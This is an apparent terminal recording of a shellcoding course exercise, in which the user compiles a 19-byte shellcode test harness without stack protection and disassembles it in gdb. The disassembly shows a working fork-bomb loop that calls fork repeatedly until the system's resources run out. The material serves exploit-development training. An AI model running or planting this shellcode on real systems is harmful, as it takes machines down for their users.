[29.925976, "o", "m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;7H\u001b[?12l\u001b[?25h"]
[30.572729, "o", "b"]
[30.724302, "o", "r"]
[31.740464, "o", "e"]
[31.940602, "o", "a"]
[32.020578, "o", "k"]
[32.108985, "o", " "]
[32.836293, "o", "*"]
[32.972158, "o", "&"]
[33.30017, "o", "c"]
[33.404378, "o", "o"]
[33.517149, "o", "d"]
[33.596487, "o", "e"]
[33.805077, "o", "\r\n"]
[33.806941, "o", "Breakpoint 1 at 0x2008\r\n(gdb) "]
[34.252161, "o", "r"]
[34.300394, "o", "u"]
[34.500352, "o", "n"]
[34.829563, "o", "\r\n"]
[34.831924, "o", "Starting program: /media/sf_SLAE_Course/SLAE/Assignment_6/fork/shellcode \r\n"]
[35.05573, "o", "Shellcode Length:  19"]
[35.056031, "o", "\r\n"]
[35.0564, "o", "eax            0x402008"]
[35.056587, "o", "\u001b[C"]
[35.05674, "o", "4202504"]
[35.056893, "o", "\r\n"]
[35.057077, "o", "ebx            0x401fd4"]
[35.057249, "o", "\u001b[C"]
[35.057393, "o", "4202452"]
[35.057535, "o", "\r\n"]
[35.057714, "o", "ecx            0x0"]
[35.057885, "o", "\u001b[6C"]
[35.058035, "o", "0"]
[35.058184, "o", "\r\n"]
[35.058383, "o", "edx            0xb7fb7890"]
[35.058709, "o", "\u001b[7C"]
[35.058878, "o", "-1208256368"]
[35.059043, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[35.05924, "o", "Dump of assembler code from 0x402008 to 0x402012:"]
[35.059399, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[35.059593, "o", "=> 0x00402008 <code+0>:"]
[35.059745, "o", "\u001b[C"]
[35.05989, "o", "sub    ecx,0x33"]
[35.060037, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[35.060242, "o", "   0x0040200b <code+3>:"]
[35.060469, "o", "\u001b[C"]
[35.060695, "o", "sub    eax,eax"]
[35.060872, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[35.061045, "o", "   0x0040200d <code+5>:"]
[35.061187, "o", "\u001b[C"]
[35.062279, "o", "mov    al,0xde\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H   0x0040200f <code+7>:\u001b[Csub    al,0xdc\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H   0x00402011 <code+9>:\u001b[Cpush   0xb\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1HEnd of assembler dump.\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1HBreakpoint 1, 0x00402008 in code ()"]
[35.062809, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[35.063026, "o", "(gdb) "]
[35.476614, "o", "d"]
[35.612211, "o", "i"]
[35.749, "o", "s"]
[35.852357, "o", "a"]
[36.052295, "o", "s"]
[36.24535, "o", "s"]
[36.42015, "o", "e"]
[37.311196, "o", "m"]
[37.428731, "o", "b"]
[37.540404, "o", "l"]
[37.724246, "o", "e"]
[37.877141, "o", " "]
[38.237611, "o", "e"]
[38.372319, "o", "i"]
[38.645066, "o", "\b\u001b[K"]
[38.812294, "o", "\b\u001b[K"]
[38.948618, "o", "4"]
[39.196299, "o", "$"]
[39.524394, "o", "\b\u001b[K"]
[39.70038, "o", "\b\u001b[K"]
[39.917209, "o", "$"]
[40.075233, "o", "\u001b[?25l\u001b[H[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb) break *&code\u001b[K\r\nBreakpoint 1 at 0x2008\u001b[K\r\n(gdb) run\u001b[K\r\nStarting program: /media/sf_SLAE_Course/SLAE/Assignment_6/fork/shellcode\u001b[K\r\nShellcode Length:  19\u001b[K\r\neax            0x402008 4202504\u001b[K\r\nebx            0x401fd4 "]
[40.075526, "o", "4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x402008 to 0x402012:\u001b[K\r\n=> 0x00402008 <code+0>: sub    ecx,0x33\u001b[K\r\n   0x0040200b <code+3>: sub    eax,eax\u001b[K\r\n   0x0040200d <code+5>: mov    al,0xde\u001b[K\r\n   0x0040200f <code+7>: sub    al,0xdc\u001b[K\r\n   0x00402011 <code+9>: push   0xb\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n\u001b[K\r\nBreakpoint 1, 0x00402008 in code ()\u001b[K\r\n(gdb) disassemble $\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;20H\u001b[?12l\u001b[?25h"]
[40.140127, "o", "\u001b[?25l\u001b[H[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb) break *&code\u001b[K\r\nBreakpoint 1 at 0x2008\u001b[K\r\n(gdb) run\u001b[K\r\nStarting program: /media/sf_SLAE_Course/SLAE/Assignment_6/fork/shellcode\u001b[K\r\nShellcode Length:  19\u001b[K\r\neax            0x402008 4202504\u001b[K\r\nebx            0x401fd4 "]
[40.143014, "o", "4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x402008 to 0x402012:\u001b[K\r\n=> 0x00402008 <code+0>: sub    ecx,0x33\u001b[K\r\n   0x0040200b <code+3>: sub    eax,eax\u001b[K\r\n   0x0040200d <code+5>: mov    al,0xde\u001b[K\r\n   0x0040200f <code+7>: sub    al,0xdc\u001b[K\r\n   0x00402011 <code+9>: push   0xb\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n\u001b[K\r\nBreakpoint 1, 0x00402008 in code ()\u001b[K\r\n(gdb) disassemble $\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;20H\u001b[?12l\u001b[?25h"]
[40.168559, "o", "e"]
[40.256464, "o", "i"]
[40.452199, "o", "p"]
[41.581476, "o", "+"]
[41.780567, "o", "3"]
[41.916202, "o", "'"]
[42.324674, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[42.326254, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[22;1HUnmatched single quote.\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[42.895267, "o", "\u0007"]
[42.896175, "o", "disassemble $eip+3'"]
[43.132657, "o", "\u001b[7Grun\u001b[K"]
[43.724416, "o", "\u001b[3Ddisassemble $eip+3'"]
[44.100387, "o", "\b\u001b[K"]
[44.796647, "o", "0"]
[45.11661, "o", "\u001b[1;23r\u001b[2S\u001b[22;1HNo function contains specified address.\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[46.270857, "o", "disassemble $eip+30"]
[46.612581, "o", "\b"]
[46.852528, "o", "\b"]
[47.036065, "o", "\b"]
[47.292526, "o", ",+30\u001b[3D"]
[47.629559, "o", "\u001b[1;23r\u001b[18S\u001b[6;1HDump of assembler code from 0x402008 to 0x402026:\r\n=> 0x00402008 <code+0>:\u001b[Csub    ecx,0x33\r\n   0x0040200b <code+3>:\u001b[Csub    eax,eax\r\n   0x0040200d <code+5>:\u001b[Cmov    al,0xde\r\n   0x0040200f <code+7>:\u001b[Csub    al,0xdc\r\n   0x00402011 <code+9>:\u001b[Cpush   0xb\r\n   0x00402013 <code+11>:\u001b[8Cpush   0x2\r\n   0x00402015 <code+13>:\u001b[8Cmov    al,0x2\r\n   0x00402017 <code+15>:\u001b[8Cint    0x80\r\n   0x00402019 <code+17>:\u001b[8Cjmp    0x402008 <code>\r\n   0x0040201b <code+19>:\u001b[8Cadd    BYTE PTR [eax],al\r\n   0x0040201d:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x0040201f:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x00402021:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x00402023:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x00402025:\u001b[2Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[50.029513, "o", "\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:46 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[50.158352, "o", "\u001b[?25l\u001b[H(gdb) disassemble $eip+3'\u001b[K\r\nUnmatched single quote.\u001b[K\r\n(gdb) disassemble $eip+30\u001b[K\r\nNo function contains specified address.\u001b[K\r\n(gdb) disassemble $eip,+30\u001b[K\r\nDump of assembler code from 0x402008 to 0x402026:\u001b[K\r\n=> 0x00402008 <code+0>: sub    ecx,0x33\u001b[K\r\n   0x0040200b <code+3>: sub    eax,eax\u001b[K\r\n   0x0040200d <code+5>: mov    al,0xde\u001b[K\r\n   0x0040200f <code+7>: sub    al,0xdc\u001b[K\r\n   0x00402011 <code+9>: push   0xb\u001b[K\r\n   0x00402013 <code+11>:        push   0x2"]
[50.158918, "o", "\u001b[K\r\n   0x00402015 <code+13>:        mov    al,0x2\u001b[K\r\n   0x00402017 <code+15>:        int    0x80\u001b[K\r\n   0x00402019 <code+17>:        jmp    0x402008 <code>\u001b[K\r\n   0x0040201b <code+19>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x0040201d:  add    BYTE PTR [eax],al\u001b[K\r\n   0x0040201f:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402021:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402023:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:46 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[50.242837, "o", "\u001b[?25l\u001b[H(gdb) disassemble $eip+3'\u001b[K\r\nUnmatched single quote.\u001b[K\r\n(gdb) disassemble $eip+30\u001b[K\r\nNo function contains specified address.\u001b[K\r\n(gdb) disassemble $eip,+30\u001b[K\r\nDump of assembler code from 0x402008 to 0x402026:\u001b[K\r\n=> 0x00402008 <code+0>: sub    ecx,0x33\u001b[K\r\n   0x0040200b <code+3>: sub    eax,eax\u001b[K\r\n   0x0040200d <code+5>: mov    al,0xde\u001b[K\r\n   0x0040200f <code+7>: sub    al,0xdc\u001b[K\r\n   0x00402011 <code+9>: push   0xb\u001b[K\r\n   0x00402013 <code+11>:        push   0x2"]
[50.243134, "o", "\u001b[K\r\n   0x00402015 <code+13>:        mov    al,0x2\u001b[K\r\n   0x00402017 <code+15>:        int    0x80\u001b[K\r\n   0x00402019 <code+17>:        jmp    0x402008 <code>\u001b[K\r\n   0x0040201b <code+19>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x0040201d:  add    BYTE PTR [eax],al\u001b[K\r\n   0x0040201f:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402021:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402023:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:46 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[56.711413, "o", "\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1mdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:46 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[56.795571, "o", "\u001b[?25l\u001b[H(gdb) disassemble $eip+3'\u001b[K\r\nUnmatched single quote.\u001b[K\r\n(gdb) disassemble $eip+30\u001b[K\r\nNo function contains specified address.\u001b[K\r\n(gdb) disassemble $eip,+30\u001b[K\r\nDump of assembler code from 0x402008 to 0x402026:\u001b[K\r\n=> 0x00402008 <code+0>: sub    ecx,0x33\u001b[K\r\n   0x0040200b <code+3>: sub    eax,eax\u001b[K\r\n   0x0040200d <code+5>: mov    al,0xde\u001b[K\r\n   0x0040200f <code+7>: sub    al,0xdc\u001b[K\r\n   0x00402011 <code+9>: push   0xb\u001b[K\r\n   0x00402013 <code+11>:        push   0x2"]
[56.795858, "o", "\u001b[K\r\n   0x00402015 <code+13>:        mov    al,0x2\u001b[K\r\n   0x00402017 <code+15>:        int    0x80\u001b[K\r\n   0x00402019 <code+17>:        jmp    0x402008 <code>\u001b[K\r\n   0x0040201b <code+19>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x0040201d:  add    BYTE PTR [eax],al\u001b[K\r\n   0x0040201f:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402021:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402023:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1mdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:46 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[56.879742, "o", "\u001b[?25l\u001b[H(gdb) disassemble $eip+3'\u001b[K\r\nUnmatched single quote.\u001b[K\r\n(gdb) disassemble $eip+30\u001b[K\r\nNo function contains specified address.\u001b[K\r\n(gdb) disassemble $eip,+30\u001b[K\r\nDump of assembler code from 0x402008 to 0x402026:\u001b[K\r\n=> 0x00402008 <code+0>: sub    ecx,0x33\u001b[K\r\n   0x0040200b <code+3>: sub    eax,eax\u001b[K\r\n   0x0040200d <code+5>: mov    al,0xde\u001b[K\r\n   0x0040200f <code+7>: sub    al,0xdc\u001b[K\r\n   0x00402011 <code+9>: push   0xb\u001b[K\r\n   0x00402013 <code+11>:        push   0x2"]
[56.88003, "o", "\u001b[K\r\n   0x00402015 <code+13>:        mov    al,0x2\u001b[K\r\n   0x00402017 <code+15>:        int    0x80\u001b[K\r\n   0x00402019 <code+17>:        jmp    0x402008 <code>\u001b[K\r\n   0x0040201b <code+19>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x0040201d:  add    BYTE PTR [eax],al\u001b[K\r\n   0x0040201f:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402021:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402023:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1mdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:46 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[57.037318, "o", "\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 13m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:46 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[57.038008, "o", "\u001b[1;24r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b]112\u0007\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t[detached (from session SLAE)]\r\n"]
